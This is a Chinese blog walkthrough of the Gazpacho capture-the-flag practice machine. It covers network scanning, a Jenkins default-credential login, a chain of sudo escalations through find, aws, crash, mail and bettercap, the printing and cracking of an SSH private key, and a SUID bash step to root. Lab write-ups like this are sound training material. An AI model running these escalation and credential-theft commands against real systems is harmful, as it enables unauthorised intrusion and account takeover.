Pepster'Blog
TheHackersLabs-Gazpacho靶机详解WP
城南花已开 Lv5
  2025-01-14 21:01:12   2025-01-22 19:49:12    1.6k 字  8 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.150  08:00:27:a0:99:3b       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:f0:df:73       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.049 seconds (124.94 hosts/sec). 4 responded
export ip=192.168.60.150
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
To scan or not to scan? That is the question.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.150:22
Open 192.168.60.150:80
Open 192.168.60.150:8080
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 21:02 CST
Initiating ARP Ping Scan at 21:02
Scanning 192.168.60.150 [1 port]
Completed ARP Ping Scan at 21:02, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:02
Completed Parallel DNS resolution of 1 host. at 21:02, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:02
Scanning 192.168.60.150 [3 ports]
Discovered open port 22/tcp on 192.168.60.150
Discovered open port 80/tcp on 192.168.60.150
Discovered open port 8080/tcp on 192.168.60.150
Completed SYN Stealth Scan at 21:02, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.150
Host is up, received arp-response (0.00093s latency).
Scanned at 2025-01-14 21:02:33 CST for 0s

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 64
80/tcp   open  http       syn-ack ttl 64
8080/tcp open  http-proxy syn-ack ttl 64
MAC Address: 08:00:27:A0:99:3B (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

在8080端口上开放了Jenkins服务,80端口只有一个登录表单,跳转not found

Github上找到有个RCE利用

gquere/pwn_jenkins: Notes about attacking Jenkins servers

漏洞入口

不过当我尝试使用默认密码登录结果就进去了

admin:12345

我们可以将Jenkins理解为一个自动化服务器,可以自动构建部署任务之类的

里面有个Script Console可以执行命令,这样就可以利用这个来反弹Shell了

image

sudo提权

拿到jenkins的Shell,有sudo权限,提权到ajo用户

不知道为啥PS1会乱,但影响不大,能操作就行

1
2
3
4
5
6
7
8
9
10
11
(remote) jenkins@gazpacho:/home/pepino$ sudo -l
Matching Defaults entries for jenkins on gazpacho:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User jenkins may run the following commands on gazpacho:
    (ajo) NOPASSWD: /usr/bin/find
(remote) jenkins@gazpacho:/home/pepino$ sudo -u ajo /usr/bin/find . -exec /bin/sh \; -quit
\[\](remote)\[\] \[\]ajo@gazpacho\[\]:\[\]/home/pepino\[\]$ id
uid=1004(ajo) gid=1004(ajo) grupos=1004(ajo)

用户ajo也有sudo权限,搁着套娃呢?

1
2
3
4
5
6
7
(remote) ajo@gazpacho:/home/ajo$ sudo -l
Matching Defaults entries for ajo on gazpacho:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User ajo may run the following commands on gazpacho:
    (cebolla) NOPASSWD: /usr/bin/aws

噢,从sh换到bash之后PS1就恢复2正常了

1
2
3
4
5
6
7
8
9
10
11
(remote) ajo@gazpacho:/home/ajo$ sudo -u cebolla /usr/bin/aws help
##这里的help是调用less,所以就需要把窗口缩小,然后输入!/bin/sh
cebolla@gazpacho:/home/ajo$ id
uid=1002(cebolla) gid=1002(cebolla) grupos=1002(cebolla)
cebolla@gazpacho:~$ sudo -l
Matching Defaults entries for cebolla on gazpacho:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User cebolla may run the following commands on gazpacho:
    (pimiento) NOPASSWD: /usr/bin/crash

尼玛的,真套娃,折磨

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
cebolla@gazpacho:~$ sudo -u pimiento /usr/bin/crash -h
#同上也是调用less
pimiento@gazpacho:~$ sudo -l
Matching Defaults entries for pimiento on gazpacho:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User pimiento may run the following commands on gazpacho:
    (pepino) NOPASSWD: /usr/bin/cat
pimiento@gazpacho:~$ sudo -u pepino /usr/bin/cat /home/pepino/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
Yu4VzXUDH0NjNESpnveBQdggNfo=
-----END OPENSSH PRIVATE KEY-----

用户提权

拿到私钥爆破一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
❯ vim id_rsa
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mittens          (id_rsa)
1g 0:00:00:58 DONE (2025-01-14 21:46) 0.01718g/s 43.44p/s 43.44c/s 43.44C/s shamrock..canela
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ ssh pepino@$ip -i id_rsa
The authenticity of host '192.168.60.150 (192.168.60.150)' can't be established.
ED25519 key fingerprint is SHA256:AQriN/tRYOEaFyAyEecHnEyZfJTHLRILd1G2j74ViR8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.150' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Linux gazpacho 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Mon Apr 29 18:48:07 2024 from 192.168.0.108
pepino@gazpacho:~$ sudo -l
Matching Defaults entries for pepino on gazpacho:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User pepino may run the following commands on gazpacho:
    (tomate) NOPASSWD: /usr/bin/mail

还套娃呢,结果user还不能读,还要套

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
pepino@gazpacho:~$ sudo -u tomate /usr/bin/mail --exec='!/bin/bash'
tomate@gazpacho:/home/pepino$ id
uid=1003(tomate) gid=1003(tomate) grupos=1003(tomate)
tomate@gazpacho:/home/pepino$ cd ~
tomate@gazpacho:~$ ls
user.txt
tomate@gazpacho:~$ cat user.txt
cat: user.txt: Permiso denegado
tomate@gazpacho:~$ sudo -l
Matching Defaults entries for tomate on gazpacho:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User tomate may run the following commands on gazpacho:
    (root) NOPASSWD: /usr/bin/bettercap

Root提权

这个bettercap之前在dockerlabs上做到过

[DockerLabs]AguaDeMayo详解WP | Pepster’Blog

里面可以执行命令

1
2
3
4
5
6
7
8
9
10
11
12
13
192.168.60.0/24 > 192.168.60.150  » !cat user.txt
8cd90f96cb765b81b730f159dfc86c08
192.168.60.0/24 > 192.168.60.150  » ! chmod +s /bin/bash
192.168.60.0/24 > 192.168.60.150  » exit
tomate@gazpacho:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1265648 abr 23  2023 /bin/bash
tomate@gazpacho:~$ bash -p
bash-5.2# whoami
root
bash-5.2# cat user.txt
8cd90f96cb765b81b730f159dfc86c08
bash-5.2# cat /root/root.txt
aea540e02fcd9062fd1bdf748ff8fa41

这个靶机是真的没意思,一直套娃😅

  1. 信息收集
    1. 服务探测
    2. 漏洞入口
    3. sudo提权
  2. 用户提权
  3. Root提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 258.9k
  1. 信息收集
    1. 服务探测
    2. 漏洞入口
    3. sudo提权
  2. 用户提权
  3. Root提权